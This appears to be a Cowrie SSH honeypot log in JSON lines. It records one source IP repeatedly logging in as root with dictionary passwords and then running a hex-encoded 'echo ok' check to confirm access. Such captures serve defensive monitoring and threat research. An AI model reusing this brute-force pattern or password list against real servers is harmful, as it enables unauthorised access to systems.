{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.398118Z","src_ip":"212.227.125.160","session":"4a1ad6365b51"}
{"eventid":"cowrie.login.success","username":"root","password":"myself","message":"login attempt [root/myself] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.469803Z","src_ip":"212.227.125.160","session":"4a1ad6365b51"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:20.586482Z","src_ip":"212.227.125.160","session":"4a1ad6365b51"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.587316Z","src_ip":"212.227.125.160","session":"4a1ad6365b51"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.612365Z","src_ip":"212.227.125.160","session":"4a1ad6365b51"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.613370Z","src_ip":"212.227.125.160","session":"4a1ad6365b51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52890,"dst_ip":"1.2.3.4","dst_port":22,"session":"2eb706b5d323","protocol":"ssh","message":"New connection: 212.227.125.160:52890 (1.2.3.4:22) [session: 2eb706b5d323]","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.634356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.635335Z","src_ip":"212.227.125.160","session":"2eb706b5d323"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.657218Z","src_ip":"212.227.125.160","session":"2eb706b5d323"}
{"eventid":"cowrie.login.success","username":"root","password":"medion","message":"login attempt [root/medion] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.759549Z","src_ip":"212.227.125.160","session":"2eb706b5d323"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:20.895576Z","src_ip":"212.227.125.160","session":"2eb706b5d323"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.896460Z","src_ip":"212.227.125.160","session":"2eb706b5d323"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.921007Z","src_ip":"212.227.125.160","session":"2eb706b5d323"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.922294Z","src_ip":"212.227.125.160","session":"2eb706b5d323"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52898,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a6810f20c7f","protocol":"ssh","message":"New connection: 212.227.125.160:52898 (1.2.3.4:22) [session: 9a6810f20c7f]","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.942505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.949515Z","src_ip":"212.227.125.160","session":"9a6810f20c7f"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.965533Z","src_ip":"212.227.125.160","session":"9a6810f20c7f"}
{"eventid":"cowrie.login.success","username":"root","password":"martina","message":"login attempt [root/martina] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:21.059455Z","src_ip":"212.227.125.160","session":"9a6810f20c7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:21.128982Z","src_ip":"212.227.125.160","session":"9a6810f20c7f"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:21.129791Z","src_ip":"212.227.125.160","session":"9a6810f20c7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:21.157990Z","src_ip":"212.227.125.160","session":"9a6810f20c7f"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:21.159164Z","src_ip":"212.227.125.160","session":"9a6810f20c7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59860,"dst_ip":"1.2.3.4","dst_port":22,"session":"913edb348b44","protocol":"ssh","message":"New connection: 212.227.125.160:59860 (1.2.3.4:22) [session: 913edb348b44]","sensor":"my-vps","timestamp":"2025-08-26T20:15:23.151302Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:23.360458Z","src_ip":"212.227.125.160","session":"913edb348b44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59874,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7ce9d6ff118","protocol":"ssh","message":"New connection: 212.227.125.160:59874 (1.2.3.4:22) [session: c7ce9d6ff118]","sensor":"my-vps","timestamp":"2025-08-26T20:15:23.572807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:23.573486Z","src_ip":"212.227.125.160","session":"c7ce9d6ff118"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T20:15:23.784882Z","src_ip":"212.227.125.160","session":"c7ce9d6ff118"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52902,"dst_ip":"1.2.3.4","dst_port":22,"session":"497de0638db2","protocol":"ssh","message":"New connection: 212.227.125.160:52902 (1.2.3.4:22) [session: 497de0638db2]","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.302375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.304364Z","src_ip":"212.227.125.160","session":"497de0638db2"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.325955Z","src_ip":"212.227.125.160","session":"497de0638db2"}
{"eventid":"cowrie.login.success","username":"root","password":"mariposa","message":"login attempt [root/mariposa] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.423834Z","src_ip":"212.227.125.160","session":"497de0638db2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:25.545637Z","src_ip":"212.227.125.160","session":"497de0638db2"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.546344Z","src_ip":"212.227.125.160","session":"497de0638db2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.579807Z","src_ip":"212.227.125.160","session":"497de0638db2"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.580862Z","src_ip":"212.227.125.160","session":"497de0638db2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52910,"dst_ip":"1.2.3.4","dst_port":22,"session":"10c1f9af0870","protocol":"ssh","message":"New connection: 212.227.125.160:52910 (1.2.3.4:22) [session: 10c1f9af0870]","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.601371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.628951Z","src_ip":"212.227.125.160","session":"10c1f9af0870"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.630069Z","src_ip":"212.227.125.160","session":"10c1f9af0870"}
{"eventid":"cowrie.login.success","username":"root","password":"indonesia","message":"login attempt [root/indonesia] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.728157Z","src_ip":"212.227.125.160","session":"10c1f9af0870"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:25.803119Z","src_ip":"212.227.125.160","session":"10c1f9af0870"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.803837Z","src_ip":"212.227.125.160","session":"10c1f9af0870"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.828225Z","src_ip":"212.227.125.160","session":"10c1f9af0870"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.829587Z","src_ip":"212.227.125.160","session":"10c1f9af0870"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52918,"dst_ip":"1.2.3.4","dst_port":22,"session":"efc7702b1914","protocol":"ssh","message":"New connection: 212.227.125.160:52918 (1.2.3.4:22) [session: efc7702b1914]","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.850636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.851773Z","src_ip":"212.227.125.160","session":"efc7702b1914"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.874172Z","src_ip":"212.227.125.160","session":"efc7702b1914"}
{"eventid":"cowrie.login.success","username":"root","password":"eternity","message":"login attempt [root/eternity] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:25.951751Z","src_ip":"212.227.125.160","session":"efc7702b1914"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:26.061087Z","src_ip":"212.227.125.160","session":"efc7702b1914"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.061776Z","src_ip":"212.227.125.160","session":"efc7702b1914"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.085402Z","src_ip":"212.227.125.160","session":"efc7702b1914"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.086418Z","src_ip":"212.227.125.160","session":"efc7702b1914"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52932,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca40336daf42","protocol":"ssh","message":"New connection: 212.227.125.160:52932 (1.2.3.4:22) [session: ca40336daf42]","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.107416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.108066Z","src_ip":"212.227.125.160","session":"ca40336daf42"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.131920Z","src_ip":"212.227.125.160","session":"ca40336daf42"}
{"eventid":"cowrie.login.success","username":"root","password":"demon","message":"login attempt [root/demon] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.202347Z","src_ip":"212.227.125.160","session":"ca40336daf42"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:26.305321Z","src_ip":"212.227.125.160","session":"ca40336daf42"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.305993Z","src_ip":"212.227.125.160","session":"ca40336daf42"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.329665Z","src_ip":"212.227.125.160","session":"ca40336daf42"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.330705Z","src_ip":"212.227.125.160","session":"ca40336daf42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52934,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ccab149c9d1","protocol":"ssh","message":"New connection: 212.227.125.160:52934 (1.2.3.4:22) [session: 6ccab149c9d1]","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.351326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:26.352164Z","src_ip":"212.227.125.160","session":"6ccab149c9d1"}
